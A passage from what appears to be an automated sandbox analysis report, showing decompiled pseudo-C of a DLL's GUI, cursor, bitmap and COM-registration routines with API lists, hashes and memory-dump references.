                                                                                                        0x1000dff9
                                                                                                        0x1000dffd
                                                                                                        0x1000e009
                                                                                                        0x1000e011
                                                                                                        0x1000e013
                                                                                                        0x1000e013
                                                                                                        0x1000e011
                                                                                                        0x1000dfd5
                                                                                                        0x1000dfd5
                                                                                                        0x1000dfd5
                                                                                                        0x1000e015
                                                                                                        0x1000e023
                                                                                                        0x1000e02c
                                                                                                        0x1000e0cc
                                                                                                        0x1000e0d3
                                                                                                        0x1000e0da
                                                                                                        0x1000e0e4
                                                                                                        0x1000e032
                                                                                                        0x1000e034
                                                                                                        0x1000e039
                                                                                                        0x1000e044
                                                                                                        0x1000e04d
                                                                                                        0x1000e04d
                                                                                                        0x1000e044
                                                                                                        0x1000e051
                                                                                                        0x1000e058
                                                                                                        0x1000e099
                                                                                                        0x1000e0a8
                                                                                                        0x1000e0b5
                                                                                                        0x1000e05a
                                                                                                        0x1000e05a
                                                                                                        0x1000e061
                                                                                                        0x1000e063
                                                                                                        0x1000e063
                                                                                                        0x1000e073
                                                                                                        0x1000e086
                                                                                                        0x1000e090
                                                                                                        0x1000e090
                                                                                                        0x1000e058
                                                                                                        0x1000e0f3
                                                                                                        0x1000e0f8
                                                                                                        0x1000e0fd
                                                                                                        0x1000e101
                                                                                                        0x1000e104
                                                                                                        0x1000e10b
                                                                                                        0x1000e113
                                                                                                        0x1000e11b
                                                                                                        0x1000e123
                                                                                                        0x1000e12a
                                                                                                        0x1000e12f
                                                                                                        0x1000e13b
                                                                                                        0x1000e143
                                                                                                        0x1000e143
                                                                                                        0x1000e131
                                                                                                        0x1000e131
                                                                                                        0x1000e131
                                                                                                        0x1000e149
                                                                                                        0x1000e158
                                                                                                        0x1000e160
                                                                                                        0x1000e160
                                                                                                        0x1000e14b
                                                                                                        0x1000e14b
                                                                                                        0x1000e14b
                                                                                                        0x1000e178

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                        • String ID: (
                                                                                                        • API String ID: 808654186-3887548279
                                                                                                        • Opcode ID: 85787c2ac3c5c56a995a776c19bd5d0477b129fd03190058c37fe231b9601763
                                                                                                        • Instruction ID: fb707396ee3149fb6cd8cd8dd1b3a8bf0fa40f6b6c89d8f3e7599025cca0cdbc
                                                                                                        • Opcode Fuzzy Hash: 85787c2ac3c5c56a995a776c19bd5d0477b129fd03190058c37fe231b9601763
                                                                                                        • Instruction Fuzzy Hash: 65518172A00219ABEB00CBA8CD85EEEBBB9EF48390F154115F905F7295DB70ED418B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002D785, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 132windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1002D785(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				void _v24;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t20;
				intOrPtr _t24;
				intOrPtr _t25;
				int _t27;
				signed int _t29;
				struct HICON__* _t34;
				struct HICON__* _t36;
				struct HPEN__* _t40;
				short _t43;
				struct HINSTANCE__* _t53;
				intOrPtr _t58;
				intOrPtr _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				int _t64;
				signed int _t66;
				void* _t68;
				void* _t69;
				void* _t73;
				void* _t74;

				_t61 = __edx;
				_t54 = __ecx;
				_t52 = __ebx;
				_t20 =  *0x10072650; // 0xb5e27fef
				_v8 = _t20 ^ _t66;
				_t62 = __ecx;
				E1002966C(__ebx, _t63, _t66, 5);
				_t64 = 0;
				_t68 =  *0x100991e0 - _t64; // 0x0
				if(_t68 != 0) {
					L12:
					_t77 =  *0x100991dc;
					if( *0x100991dc == 0) {
						_t29 = E1003C158(_t77, 0x1002d747);
						asm("sbb al, al");
						 *0x100991dc =  ~_t29 + 1;
					}
					E100296D9(5);
					 *(_t62 + 4) = _t64;
					_t24 =  *0x100991d8; // 0x0
					 *((intOrPtr*)(_t62 + 0x20)) = _t24;
					_t25 = _t24 + _t24;
					 *((intOrPtr*)(_t62 + 0x18)) = _t25;
					 *((intOrPtr*)(_t62 + 0x1c)) = _t25;
					_t27 = SetRectEmpty(_t62 + 0x28);
					 *(_t62 + 0x3c) = _t64;
					 *(_t62 + 0x38) = _t64;
					 *(_t62 + 0x40) = _t64;
					 *(_t62 + 0x44) = _t64;
					return E10039F21(_t27, _t52, _v8 ^ _t66, _t61, _t62, _t64);
				}
				_t69 =  *0x100991d0 - _t64; // 0x0
				_push(__ebx);
				if(_t69 != 0) {
					L8:
					_t74 =  *0x100991d4 - _t64; // 0x0
					if(_t74 == 0) {
						_t40 = CreatePen(2, _t64, _t64);
						_t75 = _t40 - _t64;
						 *0x100991d4 = _t40;
						if(_t40 == _t64) {
							E100296D9(5);
							E100088D4(_t54);
						}
					}
					_t53 =  *(E1000AB19(_t52, _t62, _t64, _t75) + 0xc);
					 *0x100991a8 = LoadCursorA(_t53, 0x7907);
					_t34 = LoadCursorA(_t53, 0x7908);
					_t58 =  *0x100991a8; // 0x0
					 *0x100991ac = _t34;
					 *0x100991b0 = _t58;
					 *0x100991b4 = _t34;
					 *0x100991b8 = LoadCursorA(_t53, 0x7909);
					_t36 = LoadCursorA(_t53, 0x790a);
					_t59 =  *0x100991b8; // 0x0
					 *0x100991bc = _t36;
					 *0x100991c0 = _t59;
					 *0x100991c4 = _t36;
					 *0x100991c8 = LoadCursorA(_t53, 0x790b);
					 *0x100991cc = LoadCursorA(_t53, 0x790c);
					 *0x100991d8 = GetProfileIntA("windows", "oleinplaceborderwidth", 4);
					 *0x100991e0 = 1;
					_t64 = 0;
					_pop(_t52);
					goto L12;
				} else {
					_t43 = 0x1111;
					_t60 = 0;
					do {
						 *((short*)(_t66 + _t60 * 2 - 0x14)) = _t43;
						 *((short*)(_t66 + _t60 * 2 - 0xc)) = _t43;
						_t43 = _t43 + _t43;
						_t60 = _t60 + 1;
					} while (_t60 < 4);
					_t52 = CreateBitmap(8, 8, 1, 1,  &_v24);
					if(_t52 == 0) {
						E100296D9(5);
						E100088D4(_t60);
					}
					 *0x100991d0 = CreatePatternBrush(_t52);
					DeleteObject(_t52);
					_t73 =  *0x100991d0 - _t64; // 0x0
					if(_t73 == 0) {
						E100296D9(5);
						E100088D4(_t60);
					}
					goto L8;
				}
			}






























                                                                                                        0x1002d785
                                                                                                        0x1002d785
                                                                                                        0x1002d785
                                                                                                        0x1002d78b
                                                                                                        0x1002d792
                                                                                                        0x1002d799
                                                                                                        0x1002d79b
                                                                                                        0x1002d7a0
                                                                                                        0x1002d7a2
                                                                                                        0x1002d7a8
                                                                                                        0x1002d8e4
                                                                                                        0x1002d8e4
                                                                                                        0x1002d8eb
                                                                                                        0x1002d8f2
                                                                                                        0x1002d8f9
                                                                                                        0x1002d8fe
                                                                                                        0x1002d8fe
                                                                                                        0x1002d905
                                                                                                        0x1002d90a
                                                                                                        0x1002d90d
                                                                                                        0x1002d912
                                                                                                        0x1002d915
                                                                                                        0x1002d917
                                                                                                        0x1002d91a
                                                                                                        0x1002d921
                                                                                                        0x1002d92a
                                                                                                        0x1002d92d
                                                                                                        0x1002d930
                                                                                                        0x1002d933
                                                                                                        0x1002d940
                                                                                                        0x1002d940
                                                                                                        0x1002d7ae
                                                                                                        0x1002d7b4
                                                                                                        0x1002d7b5
                                                                                                        0x1002d81b
                                                                                                        0x1002d81b
                                                                                                        0x1002d821
                                                                                                        0x1002d827
                                                                                                        0x1002d82d
                                                                                                        0x1002d82f
                                                                                                        0x1002d834
                                                                                                        0x1002d838
                                                                                                        0x1002d83d
                                                                                                        0x1002d83d
                                                                                                        0x1002d834
                                                                                                        0x1002d847
                                                                                                        0x1002d85e
                                                                                                        0x1002d863
                                                                                                        0x1002d865
                                                                                                        0x1002d871
                                                                                                        0x1002d876
                                                                                                        0x1002d87c
                                                                                                        0x1002d889
                                                                                                        0x1002d88e
                                                                                                        0x1002d890
                                                                                                        0x1002d89c
                                                                                                        0x1002d8a1
                                                                                                        0x1002d8a7
                                                                                                        0x1002d8b4
                                                                                                        0x1002d8c7
                                                                                                        0x1002d8d2
                                                                                                        0x1002d8d7
                                                                                                        0x1002d8e1
                                                                                                        0x1002d8e3
                                                                                                        0x00000000
                                                                                                        0x1002d7b7
                                                                                                        0x1002d7b7
                                                                                                        0x1002d7bc
                                                                                                        0x1002d7be
                                                                                                        0x1002d7be
                                                                                                        0x1002d7c3
                                                                                                        0x1002d7c8
                                                                                                        0x1002d7ca
                                                                                                        0x1002d7cb
                                                                                                        0x1002d7e2
                                                                                                        0x1002d7e6
                                                                                                        0x1002d7ea
                                                                                                        0x1002d7ef
                                                                                                        0x1002d7ef
                                                                                                        0x1002d7fc
                                                                                                        0x1002d801
                                                                                                        0x1002d807
                                                                                                        0x1002d80d
                                                                                                        0x1002d811
                                                                                                        0x1002d816
                                                                                                        0x1002d816
                                                                                                        0x00000000
                                                                                                        0x1002d80d

                                                                                                        APIs
                                                                                                          • Part of subcall function 1002966C: EnterCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296A8
                                                                                                          • Part of subcall function 1002966C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296B7
                                                                                                          • Part of subcall function 1002966C: LeaveCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296C4
                                                                                                          • Part of subcall function 1002966C: EnterCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296D0
                                                                                                        • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1002D7DC
                                                                                                        • CreatePatternBrush.GDI32(00000000), ref: 1002D7F5
                                                                                                        • DeleteObject.GDI32(00000000), ref: 1002D801
                                                                                                        • CreatePen.GDI32(00000002,00000000,00000000), ref: 1002D827
                                                                                                        • LoadCursorA.USER32 ref: 1002D856
                                                                                                        • LoadCursorA.USER32 ref: 1002D863
                                                                                                        • LoadCursorA.USER32 ref: 1002D881
                                                                                                        • LoadCursorA.USER32 ref: 1002D88E
                                                                                                        • LoadCursorA.USER32 ref: 1002D8AC
                                                                                                        • LoadCursorA.USER32 ref: 1002D8B9
                                                                                                        • GetProfileIntA.KERNEL32(windows,oleinplaceborderwidth,00000004), ref: 1002D8CC
                                                                                                        • SetRectEmpty.USER32(?), ref: 1002D921
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CursorLoad$CriticalSection$Create$Enter$BitmapBrushDeleteEmptyInitializeLeaveObjectPatternProfileRect
                                                                                                        • String ID: oleinplaceborderwidth$windows
                                                                                                        • API String ID: 1172225617-1250992421
                                                                                                        • Opcode ID: 6dabdecb1bebb98b79643705a930e39a32ef61c8c008d2a798b2bfcfe42a855a
                                                                                                        • Instruction ID: 108a072f32104c8e1b3c0a1676cd042793ca7758ef75f559bcc5029a0f450241
                                                                                                        • Opcode Fuzzy Hash: 6dabdecb1bebb98b79643705a930e39a32ef61c8c008d2a798b2bfcfe42a855a
                                                                                                        • Instruction Fuzzy Hash: C7414D70A44327AFF754EFB99C89A4A7BA8FB08750F40452BF609D72A1DB746440CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1003521E, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 98registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1003521E(void* __ecx, void* _a4, void* _a8, void* _a12) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				CHAR* _t23;
				signed int _t25;
				void* _t26;
				signed int _t31;
				int _t33;
				CHAR* _t36;
				char* _t42;
				CHAR* _t48;

				_t20 = _a12;
				_v8 = _t20;
				_t3 =  &_v8;
				 *_t3 = _v8 & 0x00000001;
				_t42 = "Insertable";
				if( *_t3 == 0) {
					L9:
					_t36 = 0;
					__eflags = _t20 & 0x00000002;
					if((_t20 & 0x00000002) != 0) {
						_t36 = "Apartment";
					}
					__eflags = _t20 & 0x00000004;
					if((_t20 & 0x00000004) != 0) {
						_t36 = "Free";
					}
					__eflags = (_t20 & 0x00000006) - 6;
					if((_t20 & 0x00000006) == 6) {
						_t36 = "Both";
					}
					__eflags = _t36;
					if(_t36 == 0) {
						L21:
						_t23 = 1;
						goto L7;
					} else {
						_t25 = RegOpenKeyExA(_a8, "InprocServer32", 0, 0x20006,  &_a12);
						asm("sbb esi, esi");
						_t48 =  ~_t25 + 1;
						__eflags = _t48;
						if(__eflags == 0) {
							_t26 = E1000AB19(_t36, _t42, _t48, __eflags);
							__eflags =  *((char*)(_t26 + 0x14));
							if( *((char*)(_t26 + 0x14)) == 0) {
								_t48 = 1;
								__eflags = 1;
							}
						} else {
							_t31 = RegSetValueExA(_a12, "ThreadingModel", 0, 1, _t36, lstrlenA(_t36) + 1);
							asm("sbb esi, esi");
							_t48 =  ~_t31 + 1;
							RegCloseKey(_a12);
						}
						__eflags = _t48;
						if(_t48 == 0) {
							L4:
							if(_v8 != 0) {
								RegDeleteValueA(_a8, _t42);
								RegDeleteValueA(_a4, _t42);
							}
							_t23 = _t48;
							L7:
							return _t23;
						} else {
							goto L21;
						}
					}
				}
				_t33 = RegSetValueA(_a4, _t42, 1, 0x100630e0, 0);
				if(_t33 != 0 || RegSetValueA(_a8, _t42, 1, 0x100630e0, _t33) != 0) {
					_t48 = 0;
					goto L4;
				} else {
					_t20 = _a12;
					goto L9;
				}
			}

















                                                                                                        0x10035222
                                                                                                        0x10035227
                                                                                                        0x1003522a
                                                                                                        0x1003522a
                                                                                                        0x1003522f
                                                                                                        0x10035234
                                                                                                        0x10035284
                                                                                                        0x10035284
                                                                                                        0x10035286
                                                                                                        0x10035288
                                                                                                        0x1003528a
                                                                                                        0x1003528a
                                                                                                        0x1003528f
                                                                                                        0x10035291
                                                                                                        0x10035293
                                                                                                        0x10035293
                                                                                                        0x1003529b
                                                                                                        0x1003529d
                                                                                                        0x1003529f
                                                                                                        0x1003529f
                                                                                                        0x100352a4
                                                                                                        0x100352a6
                                                                                                        0x1003530e
                                                                                                        0x10035310
                                                                                                        0x00000000
                                                                                                        0x100352a8
                                                                                                        0x100352bb
                                                                                                        0x100352c5
                                                                                                        0x100352c7
                                                                                                        0x100352c7
                                                                                                        0x100352c8
                                                                                                        0x100352f8
                                                                                                        0x100352fd
                                                                                                        0x10035301
                                                                                                        0x10035305
                                                                                                        0x10035305
                                                                                                        0x10035305
                                                                                                        0x100352ca
                                                                                                        0x100352e0
                                                                                                        0x100352ed
                                                                                                        0x100352ef
                                                                                                        0x100352f0
                                                                                                        0x100352f0
                                                                                                        0x10035306
                                                                                                        0x10035308
                                                                                                        0x10035260
                                                                                                        0x10035264
                                                                                                        0x10035270
                                                                                                        0x10035276
                                                                                                        0x10035276
                                                                                                        0x10035278
                                                                                                        0x1003527a
                                                                                                        0x1003527e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10035308
                                                                                                        0x100352a6
                                                                                                        0x1003524a
                                                                                                        0x1003524e
                                                                                                        0x1003525e
                                                                                                        0x00000000
                                                                                                        0x10035281
                                                                                                        0x10035281
                                                                                                        0x00000000
                                                                                                        0x10035281

                                                                                                        APIs
                                                                                                        • RegSetValueA.ADVAPI32(?,Insertable,00000001,100630E0,00000000), ref: 1003524A
                                                                                                        • RegSetValueA.ADVAPI32(?,Insertable,00000001,100630E0,00000000), ref: 10035258
                                                                                                        • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10035270
                                                                                                        • RegDeleteValueA.ADVAPI32(?,Insertable), ref: 10035276
                                                                                                        • RegOpenKeyExA.ADVAPI32(?,InprocServer32,00000000,00020006,?), ref: 100352BB
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 100352CB
                                                                                                        • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,00000000,00000001), ref: 100352E0
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 100352F0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Delete$CloseOpenlstrlen
                                                                                                        • String ID: Apartment$Both$Free$InprocServer32$Insertable$ThreadingModel
                                                                                                        • API String ID: 46240047-3148118246
                                                                                                        • Opcode ID: 073cbeeb0217bceb2ea807490113cd0039e5057ef3b856f867f9ca9f5b99c73c
                                                                                                        • Instruction ID: 6343040d0effde12503f252619630cd0662dcb6e40347e3624ec645e91b71008
                                                                                                        • Opcode Fuzzy Hash: 073cbeeb0217bceb2ea807490113cd0039e5057ef3b856f867f9ca9f5b99c73c
                                                                                                        • Instruction Fuzzy Hash: A3219631A00365BFEB52CE90CC85F5B37A9DB06BD6F014514FE42AE1A0C7769E1587A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10034702, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 127registrywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10034702(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x10008389);
					_t54 = 0x10097504;
					_t68 = E1002A0B5(__ebx, 0x10097504, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E1000836F(__ebx, 0x10097504, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E1000E60C(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							E1000F2EF( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x10099210; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E1000E60C(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E1002566C(_t70, 0x1005f4bc);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x10099204; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x10099208; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x10099200; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x1009920c; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1c4; // 0x1c4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E10038FF1(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x10099200 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
						 *0x10099204 = RegisterWindowMessageA("commdlg_ShareViolation");
						 *0x10099208 = RegisterWindowMessageA("commdlg_FileNameOK");
						 *0x1009920c = RegisterWindowMessageA("commdlg_ColorOK");
						 *0x10099210 = RegisterWindowMessageA("commdlg_help");
						_t46 = RegisterWindowMessageA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x10099214 = _t46;
						_push(_a12);
						_t31 = E1000998B(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                                                                                                        0x10034702
                                                                                                        0x1003470b
                                                                                                        0x10034714
                                                                                                        0x10034715
                                                                                                        0x1003471a
                                                                                                        0x10034724
                                                                                                        0x10034726
                                                                                                        0x10034728
                                                                                                        0x1003472a
                                                                                                        0x1003472a
                                                                                                        0x1003472f
                                                                                                        0x10034732
                                                                                                        0x1003473c
                                                                                                        0x1003473e
                                                                                                        0x10034743
                                                                                                        0x10034746
                                                                                                        0x1003474b
                                                                                                        0x1003474b
                                                                                                        0x1003473e
                                                                                                        0x1003474e
                                                                                                        0x1003474f
                                                                                                        0x10034757
                                                                                                        0x10034759
                                                                                                        0x100347bd
                                                                                                        0x100347c8
                                                                                                        0x1003488a
                                                                                                        0x10034895
                                                                                                        0x1003489d
                                                                                                        0x1003489d
                                                                                                        0x00000000
                                                                                                        0x1003489d
                                                                                                        0x100347ce
                                                                                                        0x100347d0
                                                                                                        0x100347de
                                                                                                        0x100347de
                                                                                                        0x100347e4
                                                                                                        0x10034872
                                                                                                        0x10034872
                                                                                                        0x00000000
                                                                                                        0x10034872
                                                                                                        0x100347f2
                                                                                                        0x100347f4
                                                                                                        0x100347f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100347ff
                                                                                                        0x10034804
                                                                                                        0x10034806
                                                                                                        0x10034818
                                                                                                        0x10034818
                                                                                                        0x1003481e
                                                                                                        0x1003482f
                                                                                                        0x10034835
                                                                                                        0x10034851
                                                                                                        0x10034857
                                                                                                        0x10034876
                                                                                                        0x1003487c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10034882
                                                                                                        0x00000000
                                                                                                        0x10034882
                                                                                                        0x1003485e
                                                                                                        0x1003485e
                                                                                                        0x1003486c
                                                                                                        0x00000000
                                                                                                        0x1003486c
                                                                                                        0x1003483a
                                                                                                        0x1003483a
                                                                                                        0x10034840
                                                                                                        0x10034846
                                                                                                        0x1003484c
                                                                                                        0x00000000
                                                                                                        0x1003484c
                                                                                                        0x10034827
                                                                                                        0x00000000
                                                                                                        0x10034827
                                                                                                        0x1003480a
                                                                                                        0x1003480f
                                                                                                        0x10034816
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10034816
                                                                                                        0x100347d2
                                                                                                        0x100347d8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003475b
                                                                                                        0x1003476d
                                                                                                        0x10034779
                                                                                                        0x10034785
                                                                                                        0x10034791
                                                                                                        0x1003479d
                                                                                                        0x100347a2
                                                                                                        0x100347a4
                                                                                                        0x100347a7
                                                                                                        0x100347ac
                                                                                                        0x100347b3
                                                                                                        0x1003489e
                                                                                                        0x00000000
                                                                                                        0x1003489f
                                                                                                        0x10034759
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,?,10008389), ref: 10034766
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_ShareViolation,?,10008389), ref: 10034772
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_FileNameOK,?,10008389), ref: 1003477E
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_ColorOK,?,10008389), ref: 1003478A
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_help,?,10008389), ref: 10034796
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_SetRGBColor,?,10008389), ref: 100347A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageRegisterWindow
                                                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                        • API String ID: 1814269913-3888057576
                                                                                                        • Opcode ID: d6e08308a8e5cae5ea31bed95bdc5af91660088502b1168ecda17d037fb221df
                                                                                                        • Instruction ID: 6d26702c7da3de746ce7f513fd18e9b1b036692a328635f30a4b6431958f008d
                                                                                                        • Opcode Fuzzy Hash: d6e08308a8e5cae5ea31bed95bdc5af91660088502b1168ecda17d037fb221df
                                                                                                        • Instruction Fuzzy Hash: 4F4175385006A6AFEB26DF25CC889AE3BE1FB44391F124426F9495F261DF31BD50CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10011EEF, Relevance: 22.6, APIs: 15, Instructions: 139windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10011EEF(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				void* _t53;
				void* _t56;
				signed int _t63;
				struct HDC__* _t64;
				struct HBITMAP__* _t65;
				struct HDC__* _t69;
				void* _t76;
				struct HDC__* _t79;
				intOrPtr* _t82;
				void* _t91;
				signed int _t92;
				intOrPtr _t100;
				int* _t101;
				int _t102;
				void* _t103;
				BITMAPINFO* _t104;
				void* _t106;

				_t52 = LoadResource(_a4, _a8);
				_v20 = _t52;
				if(_t52 == 0) {
					return _t52;
				}
				_t53 = LockResource(_t52);
				_t76 = _t53;
				_v16 = _t76;
				if(_t76 == 0) {
					L17:
					return _t53;
				}
				_push(_t103);
				_t98 =  *_t76 + 0x40;
